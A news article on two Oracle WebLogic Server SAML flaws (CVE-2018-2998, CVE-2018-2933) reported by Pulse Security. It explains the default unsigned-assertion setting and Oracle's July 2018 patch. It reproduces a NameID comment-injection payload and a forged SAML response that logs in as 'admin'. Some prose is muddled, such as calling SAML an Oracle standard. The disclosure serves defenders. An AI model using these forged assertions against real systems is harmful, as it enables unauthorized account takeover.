Multiple SAML Vulnerabilities Discovered within Oracle WebLogic Server by Security Researchers at Pulse Security

Two vulnerabilities labelled CVE-2018-2998 and CVE-2018-2933 have been discovered by Denis Andzakovic of PulseSecurity, which exploits the Oracle WebLogic Server SAML and WLS Core Components, respectively, to access and modify data to a limited degree.

Two vulnerabilities were discovered within the Oracle WebLogic SAML service provider authentication mechanism. By inserting an XML comment into the SAML NameID tag, an attacker can coerce the SAML service provider to log in as another user. Additionally, WebLogic does not require signed SAML assertions in the default configuration. By omitting the signature portions from a SAML assertion, an attacker can craft an arbitrary SAML assertion and bypass the authentication mechanism.

Denis Andzakovic – Pulse Security

The Oracle Fusion Middleware 12c WebLogic Server v.12.2.1.3.0 was found to be vulnerable to these vulnerabilities although three other versions: 10.3.6.0, 12.1.3.0, and 12.2.1.2 have been found to be affected as well.

In a risk assessment matrix published by Oracle, the CVE-2018-2998 vulnerability was assessed to exploit the SAML component locally. According to the CVSS Version 3.0, this vulnerability was given a base score of 5.4 out of 10, being assessed to have a generally low risk factor of manipulation. In the same assessment, the CVE-2018-2933 vulnerability was assessed to exploit the WLS Core components from local server devices. The vulnerability was given a slightly lower base score of 4.9 out of a possible 10. A document with ID 2421480.1 was published by Oracle for its users with instructions for the mitigation of this vulnerability. This document is accessible to Oracle administrator accounts once they log in.

The Oracle Security Assertions Markup Language (SAML) describes a framework that facilitates the sharing of authentication information across multiple devices on the same network, allowing a single device to act on the part of another. It perorms the authentication and authorization of users: whether they’re credentials are legitimate and whether they have the required permissions to perform the actions requested. More often than not, this protocol is used to setup single sign-on for users and SAML providers manage the server or administrator device that allots these credentials. Once authenticated and authorized, SAML assertion in XML allows for the completion of the user task set out. SAML 2.0 has been set as the standard for this authentication and authorization process on computers since 2005 and it is the standard employed by Oracle WebLogic Servers in the applications that they create.

Working hand in hand with the vulnerability discovered in the core components of the WebLogic Server, the two vulnerabilities were found to take advantage of the fact that WebLogic does not require signed assertions in default. The vulnerabilities manipulated the authentication and authorization mechanism by inserting an arbitrary XML comment into the Name ID tag forcing the system to allow for the sign on into another user’s account without invalidating the SAML assertion’s signature as the server only verifies the string following the comment as shown below.

<saml2:Assertion>
    <saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
        <saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">attacker<!---->admin</saml2:NameID>
    </saml2:Subject>
</saml2:Assertion>

In the administrator server configuration settings, if the SingleSignOnServicesMBean.WantAssertionsSigned attribute is disabled or not required, as is the default case, the signature is not verified, and authentication can be bypassed to allow someone to log in as any user of choice. Hackers can exploit this vulnerability to access powerful accounts in the system to disturb system settings, extract data, or corrupt servers. In this default setup that does not require signatures, the following code (shortened for readability) shared by Pulse Security exhibits how a hacker may log in as “admin”:

<?xml version="1.0" encoding="UTF-8"?>
<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:7001/saml2/sp/acs/post" ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
    <saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameidformat:entity">REDACTED</saml2:Issuer>
    <saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
        <saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
    </saml2p:Status>
    <saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="id3945308408248426654986295" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
        <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">REDACTED</saml2:Issuer>
        <saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
            <saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">admin</saml2:NameID>
            <saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
                <saml2:SubjectConfirmationData NotOnOrAfter="2018-04-22T10:33:53.593Z" Recipient="http://localhost:7001/saml2/sp/acs/post" />
            </saml2:SubjectConfirmation>
        </saml2:Subject>
        <saml2:Conditions NotBefore="2018-04-22T10:23:53.593Z" NotOnOrAfter="2018-0422T10:33:53.593Z" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
            <saml2:AudienceRestriction>
                <saml2:Audience>WLS_SP</saml2:Audience>
            </saml2:AudienceRestriction>
        </saml2:Conditions>
        <saml2:AuthnStatement AuthnInstant="2018-04-22T10:28:49.876Z" SessionIndex="id1524392933593.694282512" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
            <saml2:AuthnContext>
                <saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
            </saml2:AuthnContext>
        </saml2:AuthnStatement>
    </saml2:Assertion>
</saml2p:Response>

To cope with this vulnerability and the preceding one discovered alongside, Oracle has requested that users update the respective Oracle component of their product with the July 2018 Critical Patch for Oracle Fusion Middleware.

Aaron Michael
Aaron Micheal is an electrical engineer by profession and a hard-core gamer by passion. His exceptional experience with computer hardware and profound knowledge in gaming makes him a very competent writer. What makes him unique is his growing interest in the state of the art technologies that motivates him to learn, adopt, and integrate latest techniques into his work.